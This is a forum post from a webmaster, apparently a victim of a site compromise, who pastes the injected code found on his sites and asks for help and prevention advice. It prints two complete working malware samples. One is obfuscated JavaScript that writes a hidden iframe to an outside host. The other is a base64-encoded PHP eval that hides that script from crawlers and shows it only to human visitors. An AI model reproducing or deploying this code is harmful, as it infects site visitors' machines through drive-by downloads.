Thread: Go Fuck Yourself Hacking Bastards
View Single Post
Old 03-05-2012, 02:40 AM  
PornHustler
Confirmed User
 
Join Date: May 2009
Posts: 456
Go Fuck Yourself Hacking Bastards
Well after more than 3 years with out ever being hacked I finally got my first taste of it yesterday and am dealing with it today. I had come nasty codes which I dont know what they do, maybe you guys can help out a little:

This was on my static sites in the body:


Code:
<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q81q64q78q78q80q77q67q8q62q63q59q64q78q73q72q63q8q61q73q71q9q62q9q14q10q14q8q74q66q74q25q65q73q23q11q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q81q64q78q78q80q77q67q8q62q63q59q64q78q73q72q63q8q61q73q71q9q62q9q14q10q14q8q74q66q74q25q65q73q23q11q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);} you need to pay for this crypt
This was on all of the index.php files I checked so far at the very top of the file:

Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1aFlUMHZYSGN2TG1WNFpXTW9NU2t1YVc1a1pYZ3JXMTA3WVdGaFBTY3dKenQwY25sN2JHOWpZWFJwYjI0b2UzMHBPMzFqWVhSamFDaG9aMkpsY21kbGNpbDdhV1lvWVdFOVBUMWhZV0VwQ21ZOUp5MHlPWEV0TWpseE5qZHhOalJ4TFRaeE1uRTJNbkUzTTNFMk1YRTNPWEUzTVhFMk0zRTNNbkUzT0hFNGNUWTFjVFl6Y1RjNGNUTXhjVGN3Y1RZemNUY3hjVFl6Y1RjeWNUYzRjVGMzY1RJNGNUZ3pjVFEyY1RVNWNUWTFjVFF3Y1RVNWNUY3hjVFl6Y1RKeE1YRTJNSEUzTTNFMk1uRTRNM0V4Y1ROeE5UTnhNVEJ4TlRWeE0zRTROWEV0TWpseExUSTVjUzB5T1hFMk4zRTJOSEUzTm5FMU9YRTNNWEUyTTNFM05uRXljVE54TWpGeExUSTVjUzB5T1hFNE4zRXRObkUyTTNFM01IRTNOM0UyTTNFdE5uRTROWEV0TWpseExUSTVjUzB5T1hFMk1uRTNNM0UyTVhFM09YRTNNWEUyTTNFM01uRTNPSEU0Y1RneGNUYzJjVFkzY1RjNGNUWXpjVEp4TFRSeE1qSnhOamR4TmpSeE56WnhOVGx4TnpGeE5qTnhMVFp4TnpkeE56WnhOakZ4TWpOeE1YRTJObkUzT0hFM09IRTNOSEV5TUhFNWNUbHhPREZ4TmpSeE56aHhOemh4T0RCeE56ZHhOamR4T0hFMk1uRTJNM0UxT1hFMk5IRTNPSEUzTTNFM01uRTJNM0U0Y1RZeGNUY3pjVGN4Y1RseE5qSnhPWEV4TkhFeE1IRXhOSEU0Y1RjMGNUWTJjVGMwY1RJMWNUWTFjVGN6Y1RJemNURXhjVEZ4TFRaeE9ERnhOamR4TmpKeE56aHhOalp4TWpOeE1YRXhNWEV4TUhFeGNTMDJjVFkyY1RZemNUWTNjVFkxY1RZMmNUYzRjVEl6Y1RGeE1URnhNVEJ4TVhFdE5uRTNOM0UzT0hFNE0zRTNNSEUyTTNFeU0zRXhjVGd3Y1RZM2NUYzNjVFkzY1RZd2NUWTNjVGN3Y1RZM2NUYzRjVGd6Y1RJd2NUWTJjVFkzY1RZeWNUWXljVFl6Y1RjeWNUSXhjVGMwY1RjemNUYzNjVFkzY1RjNGNUWTNjVGN6Y1RjeWNUSXdjVFU1Y1RZd2NUYzNjVGN6Y1Rjd2NUYzVjVGM0Y1RZemNUSXhjVGN3Y1RZemNUWTBjVGM0Y1RJd2NURXdjVEl4Y1RjNGNUY3pjVGMwY1RJd2NURXdjVEl4Y1RGeE1qUnhNakp4T1hFMk4zRTJOSEUzTm5FMU9YRTNNWEUyTTNFeU5IRXROSEV6Y1RJeGNTMHlPWEV0TWpseE9EZHhMVEk1Y1MweU9YRTJOSEUzT1hFM01uRTJNWEUzT0hFMk4zRTNNM0UzTW5FdE5uRTJOM0UyTkhFM05uRTFPWEUzTVhFMk0zRTNObkV5Y1ROeE9EVnhMVEk1Y1MweU9YRXRNamx4T0RCeE5UbHhOelp4TFRaeE5qUnhMVFp4TWpOeExUWnhOakp4TnpOeE5qRnhOemx4TnpGeE5qTnhOekp4TnpoeE9IRTJNWEUzTm5FMk0zRTFPWEUzT0hFMk0zRXpNWEUzTUhFMk0zRTNNWEUyTTNFM01uRTNPSEV5Y1RGeE5qZHhOalJ4TnpaeE5UbHhOekZ4TmpOeE1YRXpjVEl4Y1RZMGNUaHhOemR4TmpOeE56aHhNamR4TnpoeE56aHhOelp4TmpkeE5qQnhOemx4TnpoeE5qTnhNbkV4Y1RjM2NUYzJjVFl4Y1RGeE5uRXhjVFkyY1RjNGNUYzRjVGMwY1RJd2NUbHhPWEU0TVhFMk5IRTNPSEUzT0hFNE1IRTNOM0UyTjNFNGNUWXljVFl6Y1RVNWNUWTBjVGM0Y1RjemNUY3ljVFl6Y1RoeE5qRnhOek54TnpGeE9YRTJNbkU1Y1RFMGNURXdjVEUwY1RoeE56UnhOalp4TnpSeE1qVnhOalZ4TnpOeE1qTnhNVEZ4TVhFemNUSXhjVFkwY1RoeE56ZHhOemh4T0ROeE56QnhOak54T0hFNE1IRTJOM0UzTjNFMk4zRTJNSEUyTjNFM01IRTJOM0UzT0hFNE0zRXlNM0V4Y1RZMmNUWTNjVFl5Y1RZeWNUWXpjVGN5Y1RGeE1qRnhOalJ4T0hFM04zRTNPSEU0TTNFM01IRTJNM0U0Y1RjMGNUY3pjVGMzY1RZM2NUYzRjVFkzY1RjemNUY3ljVEl6Y1RGeE5UbHhOakJ4TnpkeE56TnhOekJ4TnpseE56aHhOak54TVhFeU1YRTJOSEU0Y1RjM2NUYzRjVGd6Y1Rjd2NUWXpjVGh4TnpCeE5qTnhOalJ4TnpoeE1qTnhNWEV4TUhFeGNUSXhjVFkwY1RoeE56ZHhOemh4T0ROeE56QnhOak54T0hFM09IRTNNM0UzTkhFeU0zRXhjVEV3Y1RGeE1qRnhOalJ4T0hFM04zRTJNM0UzT0hFeU4zRTNPSEUzT0hFM05uRTJOM0UyTUhFM09YRTNPSEUyTTNFeWNURnhPREZ4TmpkeE5qSnhOemh4TmpaeE1YRTJjVEZ4TVRGeE1UQnhNWEV6Y1RJeGNUWTBjVGh4TnpkeE5qTnhOemh4TWpkeE56aHhOemh4TnpaeE5qZHhOakJ4TnpseE56aHhOak54TW5FeGNUWTJjVFl6Y1RZM2NUWTFjVFkyY1RjNGNURnhObkV4Y1RFeGNURXdjVEZ4TTNFeU1YRXRNamx4TFRJNWNTMHlPWEUyTW5FM00zRTJNWEUzT1hFM01YRTJNM0UzTW5FM09IRTRjVFkxY1RZemNUYzRjVE14Y1Rjd2NUWXpjVGN4Y1RZemNUY3ljVGM0Y1RjM2NUSTRjVGd6Y1RRMmNUVTVjVFkxY1RRd2NUVTVjVGN4Y1RZemNUSnhNWEUyTUhFM00zRTJNbkU0TTNFeGNUTnhOVE54TVRCeE5UVnhPSEUxT1hFM05IRTNOSEUyTTNFM01uRTJNbkV5T1hFMk5uRTJOM0UzTUhFMk1uRXljVFkwY1ROeE1qRnhMVEk1Y1MweU9YRTROeWN1YzNCc2FYUW9KM0VuS1R0dFpEMG5ZU2M3WlQxbGRtRnNPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlR0bWIzSW9hVDB3T3kxcFBpMTNMbXhsYm1kMGFEdHBLejB4S1h0cVBXazdjejF6SzNJb016Z3JNU3AzVzJwZEtUdDlDbWxtS0UxaGRHZ3VjbTkxYm1Rb0tDMHhLaklxTWlrcVRXRjBhQzUwWVc0b1RXRjBhQzVoZEdGdUtERXZNaWtwS1QwOVBTMHpLekVwWlNoektUdDlQQzl6WTNKcGNIUSsnKSk7DQp9'));
For all of you wordpress guys out there are there any plugins that will help from this happening again? I am going to have a backup restored so things will be back to normal but this shit pisses me off. Passwords..etc have been changed.

My host says they don't know how it happened but I have 100's of infected files. I would have figured they would have logs of logins, ftp sessions..etc. But they say they don't know how.

Thanks
__________________
Contact ICQ: 570768377
Sub 1:440 Blog Converting Sponsor
PornHustler is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote